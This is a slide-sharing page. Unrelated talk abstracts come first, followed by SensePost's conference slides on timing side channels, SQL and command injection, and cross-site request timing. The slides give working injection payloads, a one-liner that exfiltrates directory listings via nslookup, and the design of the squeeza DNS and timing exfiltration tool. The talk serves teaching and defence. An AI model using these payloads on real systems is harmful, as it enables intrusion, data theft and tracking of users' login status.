How information systems are built or acquired puts information, which is what they should be about, in a secondary place. Our language adapted accordingly, and we no longer talk about information systems but applications. Applications evolved in a way to break data into diverse fragments, tightly coupled with applications and expensive to integrate. The result is technical debt, which is re-paid by taking even bigger "loans", resulting in an ever-increasing technical debt. Software engineering and procurement practices work in sync with market forces to maintain this trend. This talk demonstrates how natural this situation is. The question is: can something be done to reverse the trend?
In our second session, we shall learn all about the main features and fundamentals of UiPath Studio that enable us to use the building blocks for any automation project.
📕 Detailed agenda:
Variables and Datatypes
Workflow Layouts
Arguments
Control Flows and Loops
Conditional Statements
💻 Extra training through UiPath Academy:
Variables, Constants, and Arguments in Studio
Control Flow in Studio
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsDianaGray10
Join us to learn how UiPath Apps can directly and easily interact with prebuilt connectors via Integration Service--including Salesforce, ServiceNow, Open GenAI, and more.
The best part is you can achieve this without building a custom workflow! Say goodbye to the hassle of using separate automations to call APIs. By seamlessly integrating within App Studio, you can now easily streamline your workflow, while gaining direct access to our Connector Catalog of popular applications.
We’ll discuss and demo the benefits of UiPath Apps and connectors including:
Creating a compelling user experience for any software, without the limitations of APIs.
Accelerating the app creation process, saving time and effort
Enjoying high-performance CRUD (create, read, update, delete) operations, for
seamless data management.
Speakers:
Russell Alfeche, Technology Leader, RPA at qBotic and UiPath MVP
Charlie Greenberg, host
Session 1 - Intro to Robotic Process Automation.pdfUiPathCommunity
👉 Check out our full 'Africa Series - Automation Student Developers (EN)' page to register for the full program:
https://bit.ly/Automation_Student_Kickstart
In this session, we shall introduce you to the world of automation, the UiPath Platform, and guide you on how to install and setup UiPath Studio on your Windows PC.
📕 Detailed agenda:
What is RPA? Benefits of RPA?
RPA Applications
The UiPath End-to-End Automation Platform
UiPath Studio CE Installation and Setup
💻 Extra training through UiPath Academy:
Introduction to Automation
UiPath Business Automation Platform
Explore automation development with UiPath Studio
👉 Register here for our upcoming Session 2 on June 20: Introduction to UiPath Studio Fundamentals: https://community.uipath.com/events/details/uipath-lagos-presents-session-2-introduction-to-uipath-studio-fundamentals/
MySQL InnoDB Storage Engine: Deep Dive - MydbopsMydbops
This presentation, titled "MySQL - InnoDB" and delivered by Mayank Prasad at the Mydbops Open Source Database Meetup 16 on June 8th, 2024, covers dynamic configuration of REDO logs and instant ADD/DROP columns in InnoDB.
This presentation dives deep into the world of InnoDB, exploring two ground-breaking features introduced in MySQL 8.0:
• Dynamic Configuration of REDO Logs: Enhance your database's performance and flexibility with on-the-fly adjustments to REDO log capacity. Unleash the power of the snake metaphor to visualize how InnoDB manages REDO log files.
• Instant ADD/DROP Columns: Say goodbye to costly table rebuilds! This presentation unveils how InnoDB now enables seamless addition and removal of columns without compromising data integrity or incurring downtime.
Key Learnings:
• Grasp the concept of REDO logs and their significance in InnoDB's transaction management.
• Discover the advantages of dynamic REDO log configuration and how to leverage it for optimal performance.
• Understand the inner workings of instant ADD/DROP columns and their impact on database operations.
• Gain valuable insights into the row versioning mechanism that empowers instant column modifications.
AI in the Workplace Reskilling, Upskilling, and Future Work.pptxSunil Jagani
Discover how AI is transforming the workplace and learn strategies for reskilling and upskilling employees to stay ahead. This comprehensive guide covers the impact of AI on jobs, essential skills for the future, and successful case studies from industry leaders. Embrace AI-driven changes, foster continuous learning, and build a future-ready workforce.
Read More - https://bit.ly/3VKly70
Getting the Most Out of ScyllaDB Monitoring: ShareChat's TipsScyllaDB
ScyllaDB monitoring provides a lot of useful information. But sometimes it’s not easy to find the root of the problem if something is wrong or even estimate the remaining capacity by the load on the cluster. This talk shares our team's practical tips on: 1) How to find the root of the problem by metrics if ScyllaDB is slow 2) How to interpret the load and plan capacity for the future 3) Compaction strategies and how to choose the right one 4) Important metrics which aren’t available in the default monitoring setup.
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
ScyllaDB is making a major architecture shift. We’re moving from vNode replication to tablets – fragments of tables that are distributed independently, enabling dynamic data distribution and extreme elasticity. In this keynote, ScyllaDB co-founder and CTO Avi Kivity explains the reason for this shift, provides a look at the implementation and roadmap, and shares how this shift benefits ScyllaDB users.
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving
What began over 115 years ago as a supplier of precision gauges to the automotive industry has evolved into being an industry leader in the manufacture of product branding, automotive cockpit trim and decorative appliance trim. Value-added services include in-house Design, Engineering, Program Management, Test Lab and Tool Shops.
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
It's all about the timing
1.
2. Agenda
• Who we are
• What this talk is about
• Why?
• Background
• Timing as a Channel
• Timing as a Vector
• Privacy Implications - XSRT?
• Another acronym - (D)XSRT!
• Conclusion / Questions
3. Who we are..
• SensePost
– Formed in 2000
– Written a few papers..
– Spoken at a few conferences
– Written a few books
– Done some Training
• marco
• haroon
http://www.sensepost.com/blog
4. What is this talk about?
• Timing Stuff..
• Who should care ?
– If you are a developer..
• Awareness of your applications leakage
– If you are a Pen-Tester..
• You could be missing attack vectors completely
(or stopping short of full ownage when its
relatively trivial!)
– If you like new acronyms!
• X.S.R.T
• (D)X.S.R.T
5. Stepping Back a Little
An illustrious history of side
channel attacks on computing
systems
– differential power analysis
• hardware
– EM radiation emission analysis
• hardware
– timing analysis
• software/hardware
6. Traditional Timing
• Timing has received lots of attention
over the years in the area of crypt-
analysis
– Kocher [1996]
• 1st local results against RSA and DH
– Brumley & Boneh [2003]
• Derived partial RSA over network due to
weaknesses in OpenSSL
– Bernstein [2004]
• Derived full AES key across custom network
clients
– Percival [2005]
• L1 cache access times could be used on HT
processors to derive RSA key bits
7. Web Time
• Felten & Schneider [2000]
– early results on timing and the web
– focused on privacy
• browser cache snooping
• dns cache snooping
• Kinderman [2003]
– Java applet in JavaScript
8. Web Time Point Oh
– Grossman & Niedzialkowski [2006]
– SPI Dynamics [2006]
• Both released a JavaScript port scanner
using JS’s onerror feature. Implicitly
uses timing attacks (connection timed
out, hence it is closed)
– Bortz, Boneh & Nandy [2007]
• Direct timing (valid usernames, hidden
gallery sizes)
• Cross Site Timing
– <img onerror=xxxxx>
9. A Communication Channel
• A solid channel is a real basic
requirement.
• A quick progression of remote
command execution attacks
(relevant to channels)
10. The App. Is the Channel
• Sometimes the application by its
nature gives data back to the
attacker..
• Command injection
• Friendly SQL queries
11. The App. Is the Channel
• Sometimes the firewalling is so poor
that the whole things is almost moot!
• But we cant count on being that
lucky…
12. The App. Is the Channel
• So what happens when it gets a little
tighter?
$search_term = $user_input;
if($recordset =~ /$search_term/ig)
do_stuff();
13. The App. Is the Channel
$search_term = $user_input;
if($recordset =~ /$search_term/ig)
do_stuff();
(?{`uname`;})
(?{`sleep 20`;})
(?{`perl -e 'system("sleep","10");'`;})
(?{`perl -e 'sleep(ord(substr(qx/uname/,
0,1)))'`;})
14. Proof of my lame’ness
wh00t:~/customers/bh haroon$ python timing.py "uname"
[*] POST built and encoded
[*] Got Response: HTTP/1.1 200
[*] [83.0] seconds
[*] ['S']
[*] POST built and encoded
[*] Got Response: HTTP/1.1 200
[*] [83.0, 117.0] seconds
[*] ['S', 'u']
[*] POST built and encoded
[*] Got Response: HTTP/1.1 200
[*] [83.0, 117.0, 110.0] seconds
[*] ['S', 'u', 'n']
[*] POST built and encoded
[*] Got Response: HTTP/1.1 200
[*] [83.0, 117.0, 110.0, 79.0] seconds
[*] ['S', 'u', 'n', 'O']
[*] POST built and encoded
[*] Got Response: HTTP/1.1 200
[*] [83.0, 117.0, 110.0, 79.0, 83.0] seconds
[*] ['S', 'u', 'n', 'O', 'S']
[*] POST built and encoded
[*] Got Response: HTTP/1.1 200
[*] [83.0, 117.0, 110.0, 79.0, 83.0, 10.0] seconds
[*] ['S', 'u', 'n', 'O', 'S', 'n']
15. Proof (II)
• Clearly this had issues..
• ord('A') => 65
• unpack(B32, ’A') => 01000001
– Sleep 0
– Sleep 1
– Sleep 0
–…
16. SQL Injection (Classic)
• SQL & WWW Server are the same
box.. (same as birdseye)
• echo foo > c:inetpubwwwroot..
18. Confirming execution?
• Call home: (ping, smb,nc..etc)
• Rudimentary timing: (‘ping -n20
localhost’)
• Nslookup:‘nslookup
moo_moo.sensepost.com’
• We thought DNS was worth chasing..
19. Poor mans dns tunnel
• for /F "usebackq tokens=1,2,3,4* %i in ('dir c:
/b') do nslookup %i.sensepost.com
• Works fine for small pieces of data..
• Sucks for anything binary..
• Sucks for anthing over 255 chars
20. Poor mans dns tunnel
• Aka - introducing squeeza
• Inspired (in part) by Sec-1
Automagic SQL Injector..
• Provides
– Simple shell to pull server-side data
into tables (sql query / xp_cmdshell /
etc)
– Return channel to get inserted data from
the server to us
– Binary-safe transport
– Reliable transport
• Requirements
– ruby
– tcpdump
– possibly access to a DNS server
– large SQL injection point
21. Squeeza’s DNS internals 1
Basic Operation:
1. Initial HTTP request pulls data into a
predefined table SQCMD.
2. For each row ri in SQCMD, send a HTTP
request to:
a) chop ri into fixed-size blocks
b1, b2, … bn = ri
b) For each block bj, convert to hex
hj = hex(bj)
c) Prepend header to and append domain to hj.
d) Initiate DNS lookup for hj.
e) Capture the DNS request with Squeeza, decode
hex and store the block.
3. If blocks are missing, re-request them.
22. Squeeza’s DNS internals 2
• Keep in mind that pulling data into
the table is not related to
extracting it. i.e. the source can
vary
• The default method of kicking off DNS
queries is xp_cmdshell+nslookup.
Oftentimes that stored proc isn’t
available or allowed.
• Can we cause DNS request to be
initiated otherwise?
1_29_1_93.0x717171717171717171717171717171717
171717171717171.7171717171.sensepost.com.c$
• Of course!
• xp_getfiledetails()
24. Hey!!
• I thought this talk was about timing?
• SQL Server’s “waitfor delay”
• Used by a few injection tools as a
boolean operator (sql injector
powershell, sqlninja, etc)
• If user=sa {waitfor 10}, else{waitfor
delay 20}
• So… (considering lessons learned from
squeeza_I and oneTime.py, we can:
– Execute command / extract data into new
table
– Encode table as binary strings `hostname`
= winbox = 01110111 01101001 01101110
01100010 01101111 01111000
– Sleep 0, sleep 2, sleep 2, sleep 0, ..
25. More proof of my lame’ness
• Aka - more squeeza coolness..
• anotherTime.py:
• Squeeza’s timing channel:
26. But how reliable is timing?
• Well, that all depends on how
reliable your line is
• But we can try to accommodate shaky
lines and loaded servers with a
sprinkling of stats
• Basic calibration idea is to collect
a sample set of 0-bit and 1-bit
requests, discard outliers, apply
elementary statistics and derive two
landing pads
• If the landing pads are far enough
apart, we’ll use them, otherwise
increase the time delay for 1-bits
and re-calibrate
27. Timing Calibration
Request Timings
100
90
80
70
re u n y
60
F qec
0-bit
50
1-bit
40
30
20
10
0
5
15
25
35
45
55
65
75
85
95
5
10
Time in ms
0-bit Discarded 1-bit Discarded
0 time
29. Timing as its own Vector
• Information Leakage is big when
Application Testing
• (not just because it allows security
guys to say “Use generic error
messages!”)
• This is useful to us as attackers /
analysts..
30. But..
• We have been beating this drum
for a bit,
• So you see it less frequently in
the wild,
• But..
– Subtle timing differences are
sometimes present,
– We just haven't been listening..
– Hardware security Tokens (longer
round trip times)
31. Timing failed logins
• Perfect example of what we
discussed..
• Can you spot it ?
• We thought it was pretty cool at the
time.. (yetAnotherTime.py)
32. Why is this scary?
• We took a quick look at most
popular application scanners out
there..
• None made any reference at all
to caring about timing at all..
• We built it into Suru (but to be
honest, only since we discovered
timing love!)
• Do it manually, buy Suru, or
step on your app-scan vendors!
33. Timing and Privacy
• Same Origin Policy:
• The point was simple: Don’t let site-
A get results from site-B unless they
are related..
• So how did Jeremiah (and friends) do
all that port-scanning coolness?
– They used JavaScript onLoad() and
onError() events to determine if they can
access a host:port
– Variation with CSS and link visited
followed.
34. Timing and Privacy
• Portscanning was soon followed
by History checking:
• Using CSS to determine if links
were visited.
• Ed Felten in 2000 examined the
dangers of Java and Timing to
users Privacy by timing load
times.
• Felten’s 2000 Timing Attack on
Privacy.
35. We thought
• We thought we invented a new
acronym..
• XSRT - Cross Site Request Timing..
– We were wrong: (Andrew Bortz - 2007)
– Exactly the same attack: (Are you
currently logged into linkedin / myspace
/ facebook / bank.com / internetbanking?)
• Example:
– Fetch
(http://www.facebook.com/friends.php?r)
36. X.S.R.T
• Cross Site Request Timing..
• Simply:
• Victim visits attackers website (or
site with attackers JS)
• JavaScript causes Victims browser to
surf to
http://www.facebook.com/friends.php?r
• JavaScript determines load time, to
decide if user is (or isnt logged in)
(> 50ms - user logged in)
• Problem: This doesn’t work the same
for U.S victims and .ZA victims! (.za
adds 100ms just by default!)
37. X.S.R.T
• We introduce the concept of a base-
page
1. Fetch page available to both Logged-in
and Logged-out users (base-page) (X
Seconds)
2. Fetch the page available only to
Logged-in users (Y Seconds)
3. Calculate X/Y
• This gives us a latency resistant
method of determining logged-
in/logged-out status
• (What about cached pages?)
38. • Wow! We can tell a user if he is
or isnt logged into mailbox?
• (Can we determine this
remotely?)
39. So..
• Lets summarize this quickly..
– We know some sites will betray
valid usernames through timing
differences
– We know that (most) sites will
betray a valid login from an
invalid one based on timing..
– We know we can use your browser to
time stuff while you are surfing..
40. Hampster!!
QuickTime™ and a
xvid decompressor
are needed to see this picture.
41. (D) X.S.R.T
• (Re)Introducing:
• Distributed Cross Site Request Timing
• Lets take it in stages:
– Recall the timing script we ran against
the Internet Banking site (timing.py)
– We can implement that in JavaScript (so
instead of running it from through python
on my box, I can run it in JavaScript on
your box!)
– A small time granularity problem!
42. A More Granular Timer?
// pdp architects code to obtain local browser IP Address
func t io n g et Net In fo() {
var s o ck = n e w ja va.net .So ck e t();
so ck.bi n d(n e w jav a .ne t .In e tSo cketA dd ress( '0. 0 .0 .0', 0));
so ck. con n e ct(n e w java.net .Ine tSoc ke t Address (d o cum e nt .domain ,
(!d o cum e nt .lo cat io n.po rt)?8 0: d o cum e nt. loc a ti o n. p or t ));
ret u rn {doma in: so ck .get LocalAd d res s ().g e t Ho stNam e (), ip:
so ck. g etL o calAdd ress( ).g et Ho s tAdd re ss()};
}
So: nanoTime() from java.lang.System
43. (D) X.S.R.T
• Distributed Cross Site Request Timing
• Lets take it in stages:
– Recall the timing script we ran against the
Internet Banking site (timing.py)
– We can implement that in JavaScript (so instead
of running it from through python on my box, I
can run it in JavaScript on your box!)
– A small time granularity problem! (No problem!)
– timing.py => timing.js :)
– Runs in your browser, Reports success to
Attackers Machine
45. Conclusion.
• Developers:
– Make sure you are not throwing away
valuable intel through timing delta’s
– Investigate the standard XSRF detection
techniques
• Network Security Admins:
– Re-examine least privelege, Does your SQL
Server need DNS?
– Does your IDS detect spurious DNS
requests? (to your own DNS Server?)
– Would you spot the Timing Attacks in your
logs?
• Pen-Testers / Researchers:
– XSS + Header Injection..
– Grab a copy of squeeza from
http://www.sensepost.com/research/squeeza
– Add modules / Drop us feedback
• All:
– Feedback
– http://www.sensepost.com/blog